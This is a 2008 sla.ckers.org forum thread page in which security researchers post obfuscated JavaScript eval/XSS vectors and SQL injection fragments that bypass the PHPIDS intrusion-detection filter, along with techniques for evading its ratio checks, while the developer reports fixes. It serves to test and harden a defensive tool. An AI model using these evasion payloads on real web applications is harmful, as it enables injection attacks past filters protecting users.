Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1112131415161718192021...LastNext
Current Page: 16 of 31
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Gareth Heyes
Date: January 13, 2008 02:33PM

Yeah I mentioned a while back that you should do a JS version ;)
I can't see how you can sandbox server side though

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 13, 2008 02:35PM

Spidermonkey

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Gareth Heyes
Date: January 13, 2008 02:36PM

Yeah I know you can execute javascript server side but I'd think you'd have the same problem. Unless you take the Google Caja approach

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 13, 2008 02:44PM

Yep - and that should be a bit tooo early right now

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Reiners
Date: January 13, 2008 04:16PM

Quote

1'*@a or'1
1'*column or'1
1'*id-'0

they all still work by using some spaces:

1' * @a or '1
1' * column or '1
1' * id - '0

Options: ReplyQuote
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: thornmaker
Date: January 13, 2008 05:42PM

Not a Number sure acts like one. Not Not a Number is true: http://p42.us/phpids/43.html

$='e'
$x=!NaN?NaN[$+'val']:$
$x($x('nam'+$)+$)

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: tx
Date: January 14, 2008 03:02AM

@thornmaker: nice find!:)

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: thornmaker
Date: January 14, 2008 09:33PM

twins!

[p42.us]
$='e'
$x=0e0[$+'val']
$x($x('nam'+$)+$)

[p42.us]
$='e'
a:x=0e0[$+'val']
x(x('nam'+$)+$)

Options: ReplyQuote
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Anonymous User
Date: January 15, 2008 03:02AM

Nice - they didn't work on FF Ubuntu but I saw where this pointed at ;) Fixed!

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 17, 2008 12:51AM

It's amazing what you can do with a little $: http://p42.us/phpids/47.html

$='e'
,x=$[$+'val']
x(x('nam'+$)+$)

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 19, 2008 10:45PM

@.mario: The new filters do a good job at stoping x=0['eval'] type injections. I can get an alert through still, but haven't yet been able to inject a double eval as is often necessary for arbitrary code execution --> [demo.phpids.org] and similarly [demo.phpids.org]
0[('ev')+(n='')+(z=('al'),z)](z+'ert(0),'+/x/)
and
0[('ev')+status+(z=('al'),z)](z+'ert(0),'+/x/)



Edited 1 time(s). Last edit at 01/19/2008 10:46PM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 20, 2008 02:35AM

I had some more time to kill waiting for mythtv to compile.... [p42.us]
$x={}.eval,$x($x(('na'+status+('me')+/x/))

[edit] this one should work, but doesn't, and I can't figure out why. [p42.us]
$={}.eval,$($('na'+navigator.vendor+('me,')+/x/))



Edited 1 time(s). Last edit at 01/20/2008 03:31AM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: January 20, 2008 04:31AM

Hi!

Hehe - I knew the navigator properties would some when be abused to obfuscate a vector :) I did just a slight modification to the rules but changed the centrifuge - this way all stings are detected correctly w/o too many customizations. Thx!

Greetings,
.mario



Edited 1 time(s). Last edit at 01/20/2008 04:31AM by .mario.

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 20, 2008 10:07PM

http://p42.us/phpids/50.html

$=.1.eval,$($('na'+status+('me'),1))

[edit] I don't think the centrifuge ratio check is very effective.
            if($overall_length/$stripped_length <= 3.5) {
                $value .= "\n§[!!!]";            
            }
If this was the only thing catching an injection, it is trivial to get around. For example, if the best I could do with the above injection was
$=.1.eval,$($('na'+navigator.vendor+('me'),1))
this would presently only be blocked by this ratio check. This is trivial to get around however. For example, you can embed a bunch of white space chars at the end, embed white space characters throughout the injection, or even add in \w characters in the middle of the injection e.g. change the variable $ to $xxxxxxxxx. The rest of the centrifuge is certainly effective, and is the primary reason the injections have been diminishing over time. I just can't think of a good way to use a ratio check like this that can't be avoided with minimal effort.



Edited 1 time(s). Last edit at 01/20/2008 11:35PM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: January 21, 2008 02:48AM

Hi!

I know - the ratio check is still in work. I am currently testing on how to avoid that problem with the \w repetition most efficiently but haven't had time to search for a solution in depth. But will be done during the next days. A quick fix will be to trim all empty spaces before the measurement but that of course isn't bulletproof either. I think I will run a series of tests either this evening or Friday - let's see what can be accomplished ;)

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: January 21, 2008 03:44AM

@mario

Why don't you create a alert logger that interacts with the centrifuge engine? That way the PHPIDS can fix itself ;)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: January 21, 2008 05:14AM

@Gareth:

That sounds interesting but there would be a lot of planning necessary for such a feature. This would mean a complete JS based IPS/IDS which is able to communicate with a|the server and update the centrifuge.

The current target is to get rid of the overlong concatenation rules - that demands lots of optimizations of the centrifuge first (and we are indeed pretty close to getting there). After that - let's see. I think the generic attack detection definitely has potential.

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 21, 2008 04:11PM

An injection can be massaged to have any [\w\s] to [^\w\s] ratio needed... I just don't see that approach ever working.

I think your present approach of filtering for 3 different classes of characters that are typically only found in code is a good way to go about it, though it does seem a bit overly complicated the way it substitutes characters, shuffles, and then matches against a regex.

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 21, 2008 04:18PM

 $xxxxxxx=.1.eval,$xxxxxxx($xxxxxxx('na'+status+('me'),1)) 

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: January 21, 2008 04:55PM

hehe cool :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: January 21, 2008 05:30PM

Cool indeed - but anyway - the centrifuge components are still a work in progress. I will take care of that issue Wednesday evening.

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: January 21, 2008 05:46PM

Kay - I did a fix but it's not the nicest one. I will look deeper into that issue on Wednesday evening :)

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Gareth Heyes
Date: January 21, 2008 06:35PM

Hey mario + team

You're all doing a great job btw, protecting against this stuff isn't easy and I think the PHPIDS has come a long way since the first version.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: tx
Date: January 21, 2008 07:51PM

thornmaker Wrote:
-------------------------------------------------------
> An injection can be massaged to have any [\w\s] to
> [^\w\s] ratio needed... I just don't see that
> approach ever working.
[snip]
> $xxxxxxx=.1.eval,$xxxxxxx($xxxxxxx('na'+status+('me'),1))

@thornmaker: I have the feeling your probably right.
But I wonder, what about looking at unique "words" and using that count in the ratio as well, as opposed to just characters classes. That is, in the vector that thronmaker posted, I see 6 unique 'words':
$xxxxxxx
1
eval
na
status
me

Although you can pretty much infinitely pad out your variable names, to a certain extent you can make that irrelevant, because a variable is only useful if it's used. I mean that, a variable will have to be assigned and called which means we should see it at least twice (in many vectors, though not all).

If that approach is taken then a variable like $x is the same as $xxxxxxxxxxxxx so long as we can 'mark' it essentially as a variable (based on the fact that it's used multiple times) and weight it accordingly.

EDIT: This can be bypassed by inserting comments containing natural looking language or by assigning values to strings that are never used, but I think it has promise:
$str_length_weight = count($unique_words)/str_len($vector); //just pseudo code, but you get the idea.

<wishful_thinking type='unrealistic'>
what phpids needs is a fully sandboxed universal parser
</wishful_thinking>

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 01/21/2008 09:58PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 22, 2008 12:00AM

@tx: I think inserting random code in comments is very doable, or creating dummy variables in insignificant places, or by adding strings or regular expressions in with textual data.

@Gareth (and PHP Team): I definitely agree! The project has come a long way, and the team is doing a terrific job :)

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: January 22, 2008 06:47AM

Thx ;)

@tx: I agree with your wishful thoughts - but there are many obstacles on the path to create a tool which utilizes that kind of helpers _and_ is still usable and compatible to most default settings. I heard about several people trying to install and use the PHPIDS and they even had difficulties in reading out the total impact from the result object - so there's no way we can expect them to install spidermonkey or similar stuff :-/

@all: The method tx mentioned is _kind of_ used at the moment as a hot fix for the weight fuzzing issue. It works fine for JS since all word character sequences longer than a certain amount are normalized to a fix length. If you try to create noise with special chars the centrifuge method strikes again. At the moment you can circumvent this by using Unicode nodes like ß, ä and so on - see Gareth's variable tester for more *g* - I will take care of that asap - although it hurts me to have the second position in the code where \p{L} is needed...

Greetings!
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Reiners
Date: January 22, 2008 09:39AM

Quote

Hey mario + team

You're all doing a great job btw, protecting against this stuff isn't easy and I think the PHPIDS has come a long way since the first version.

very true! thats why tiny slips are no problem ;)

1' *id-'0

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 22, 2008 09:40AM

The centrifuge can also be circumvented by staying under 30 chars (22 to be exact!): http://p42.us/phpids/51.html
and a much longer example which messes with any ratio detection: http://p42.us/phpids/51a.html

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: Anonymous User
Date: January 22, 2008 11:37AM

Yikes - comments.. Who invented those double-slashers ;)

Anyway: I fixed the problem and during the process i reviewed the rules some more and deleted loads of stuff we could have thrown away weeks ago. Which is good. All injections are fixed - including the SQLIs that slipped through somehow. 10x!

Current revision: 26955 bytes
Last revision: 27929 bytes

Options: ReplyQuote
Re: PHPIDS (0.4.5 - the alpha and the omega)
Posted by: thornmaker
Date: January 22, 2008 12:44PM

http://p42.us/phpids/52.html

$=.7.eval,$($('\rname'),1)

for the record: \f \t \r and \n all seem to work... can I buy a vowel? :)



Edited 1 time(s). Last edit at 01/22/2008 12:47PM by thornmaker.

Options: ReplyQuote
Pages: PreviousFirst...1112131415161718192021...LastNext
Current Page: 16 of 31


Sorry, only registered users may post in this forum.